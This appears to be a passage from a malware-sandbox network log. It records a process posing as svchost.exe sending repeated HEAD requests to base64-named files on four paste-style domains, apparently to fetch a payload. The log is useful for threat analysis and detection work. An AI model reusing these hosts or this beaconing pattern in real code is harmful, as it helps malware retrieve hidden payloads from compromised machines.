                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JvSFnmTKG5Wv9aHBzANKTNBBLjc2VhKpoecP8j7b1aPwydeCZ%2B0iRNNaAHRP4aq4bXy3vEP%2Fmhtd4LpPrcooBcDA2nCez3D66AZCzoQyzb%2Bd3AKbd9pUefDZaC4cV9SklMYz"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc40efae34414-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1746&rtt_var=873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              89192.168.2.750242172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:10.395867109 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:10.850568056 CET862INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:10 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:10 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IX8edTRBYVzrLPiJlDGKiwwwEHffX2EAKfVQq23nDFKe9CzMWSKRq0sqOAoqLzy8s3KJqT2wLwtdC%2BynHSlubkYTzso3%2BSND%2F0DzaV46krImQ32I%2Bgc5rQVPJBssbM9G"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc410793818c0-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              90192.168.2.750247172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:10.856626034 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:11.339298010 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:11 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:11 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oVGnkxFKrmiBxFqWBk%2FDEqqy7WOGRteN%2B%2BoZKw4HdC6gKVaxJ%2BRmsaR3b3Crftg7OT55bo2EH01t9ozUzb9pjGkZygFaW%2BhFUhc41ZAn0Xw0i9i7nzZhIlA1iWTM241XPy1n"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4138c96435b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1584&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              91192.168.2.750249188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:11.138648987 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:11.596618891 CET872INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:11 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:11 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jCz7ev9q95ohfnsR9zFiZ6503jUt185n53SEYWaPVTgv0NvJ%2B2RvusOKMkntoKOniiLNBBlpPjzLHoH29seh%2FsbmdwaeUocmW7SwAbylDfCNoiVPoO18InRe%2FdgNOw29aFE%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4152ecb8c69-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1760&rtt_var=880&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              92192.168.2.750251104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:11.345406055 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:11.813663960 CET887INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:11 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:11 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H4ZltB6Ld%2B4QmvvTbj012N94iHeyKHcxv2Q2u%2BQf%2B%2BeTlHw0vacOlfMuaEhQ%2BTyrOs7mJ1PFDhOQqVIgk%2F%2BraXL1jr8xuDBmVoN%2BjyJRHHaNl2OyHNrL7LVTQtUMjXtyI3%2BJ"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc41688a14414-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1678&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              93192.168.2.750253172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:11.602885962 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:12.066726923 CET853INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:12 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MC3eNc3LR6030HP4wEfjkE2To1Qeq6Pnk1ocp0mNyrB7TSteDMn2oenCiRgQNTmtSP1Eb3RnNb7pwinvVRpAHzu78CUokp3cEKBh3LDt0TfXrrephRbDTXfvntb7E0ec"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc418180d41c3-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=70&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              94192.168.2.750258172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:12.073554993 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:12.537415028 CET869INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:12 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bm1YkZJBSNWwEgKiuN2Tn11AyK4z2fJuSbl8w5sszytbu9gtRtMMYOpnNWoKeAM9Gex5RcOJIKeSxKOg%2BssSjL9b%2B6487mOGKXQIEJEJkmWJ1nScFdOV9sIsFUWm99qqpXCk"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc41b084c0f9c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1512&min_rtt=1512&rtt_var=756&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              95192.168.2.750260188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:12.340502977 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:12.833381891 CET877INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:12 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hinF8JZid7AkW3NIWPYI26fq6bUfOYOQnNx%2FyJ1N%2F1%2BtQ8bOi5JGFXu7Ql7oo287NrRwY2FbtFKE7OoIHB6s%2Fst%2FS54Qa1Dic3xFfx7gmywVOexQIyXkxdwszv1wDGzoDhs%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc41cdc550f5d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2745&min_rtt=2745&rtt_var=1372&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              96192.168.2.750262104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:12.572257996 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:13.027383089 CET875INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:12 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eFwZcKht83EfIygwwTTMKS9sy7yvq9wYfXKzscYZH2i6PZZntn1yhV%2FoKQ7nHolrAmdILR4Tjw6%2F5eJYLSXhe14aAJ4vlrglDtDIJXueH5ewxsSLLhtPF%2BLvOfxeodGb2YZX"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc41e1dd67c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1907&min_rtt=1907&rtt_var=953&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              97192.168.2.750264172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:12.855453014 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:13.318712950 CET865INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:13 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:13 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zk4HeXyP%2BGx%2Flhw9Ia3GvnCRHp%2BtAbhOXWl5YOFvyy%2BoqOrucQooOEbkKA5tdypQIBzmfRZoLTuV7fT1zEgZUckOPTcSIh29bU1uUKcw66F%2F6VUhfDdDpeNSNHdhLEFT"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc41fed5941f2-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2412&min_rtt=2412&rtt_var=1206&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              98192.168.2.750270172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:13.325016975 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:13.792431116 CET881INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:13 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:13 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hm1A6B%2Bee98TpsSDNg5Si2%2B29hFznUOZm%2FQ3gPPH2BG27Mj%2F%2FKHa1hZ33mbrPCsELT%2FdzNJn4vo1PgGkPPIEHe5iGiv3%2BZqGJpFmTiReLCtW%2BcvuVN34PSkgj9P88jI9P5Ft"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc422d9628c39-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1906&min_rtt=1906&rtt_var=953&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              99192.168.2.750272188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:13.547885895 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:14.002796888 CET868INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:13 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:13 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HoylEVQHXicjbdHW%2Bv21nwHUfc97GafwzG97yQjMO1Sz1n1yBEtvk17YYTb16eS4oglheNVJ3Pb4AlbgOknJI95fzuv3SP8Z8gyh5H4kFmxXES8dwNMxIouWPrxUZmc8hLY%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4242933c402-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1452&min_rtt=1452&rtt_var=726&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              100192.168.2.750274104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:13.798412085 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:14.249157906 CET881INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:14 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:14 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gsnECbPaMOOrrXTwmJEJg9SzcNRfCHIede9z4YRU2zDhjcceWgCYP4y%2F6ZLi0uM7PH12oQOUQQLV1T4jpJhQk0pZ2tM%2FY1ot8i%2F0TsIA2wj8o%2FX1tUC8SBd%2FQ%2Fq8KKZbwQAM"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc425c871c358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1611&rtt_var=805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              101192.168.2.750276172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:14.011379004 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:14.493922949 CET862INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:14 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:14 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2vEpq38Jg9UTdCm%2BNItCHeNL%2FcE1WxM5MU0psve6LF0miqZEqzpaHFz8MgZSg7a6d6vuMzaNmFA%2FhDH8AhMKWQGTMAROFv3ihxfa5m%2FsCResOe7HiikaBYJZtF780UBr"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4273deec466-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1618&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              102192.168.2.750282172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:14.503729105 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:15.023123980 CET869INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:14 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:14 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rsr8QRb637p7aS07l6lgVeYpyjgGufJMartFB80Rvcrfb0AngugbfILSFzBLbk8K0BZPcrEFGg9bw2xfKclNGl4ep8dVmN7%2BJ4IXkJuBRoq8wcjeyngTH5itf%2F52N74CoLhh"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc42a8a20c352-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1484&rtt_var=742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              103192.168.2.750284188.114.97.3807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:14.804464102 CET86OUTHEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:15.276155949 CET874INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:15 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:15 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kxjv1bO2d1HJPSmpB2MtVIe%2F3h6aerFQCDI6fRruu1a7v5oqAIRxVOp6W5rPpFbdVrT065a%2FpMEOtzXfSwAGFSE%2BgDL6QvIxMKvadt%2FOUnsxJAsxMtcJCLHnw3NeCB22IwA%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc42c2c8e0f7b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1495&rtt_var=747&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              104192.168.2.750286104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:15.031341076 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:15.482400894 CET880INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:15 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:15 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y8levdg8xiCaI84%2B4FQ7t%2FSkEvYera3HnUDff7WqiCbkhtNsKm%2BvTT1gwTXYJYGcfy2QbhpT%2Bi06LKi39JQDj9ccyrvsGyYqhoSWCrsY1tCIJMjo81fXH2d2tBqRhCW2AP2%2B"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc42d7f9b8ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2983&min_rtt=2983&rtt_var=1491&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              105192.168.2.750288172.67.198.113807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:15.284837008 CET80OUTHEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:15.758469105 CET868INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:15 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:15 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TwCn5lgkeBUnqY7JkAQ9rH0p3w2a%2BNT3ocW4okVtQ3e8%2B1nXghy8cSqnT%2BHZEbG%2FRdOb%2FtBpvGjqpDrn%2FROmSdWhWGoQXeFt61FEj5FLEly6uwGRjxWzahTHIzy6f%2BXY"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc42f2f0a7d16-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1914&min_rtt=1914&rtt_var=957&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              106192.168.2.750293172.67.176.186807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:15.820755959 CET87OUTHEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:16.274784088 CET871INHTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:16 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:16 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
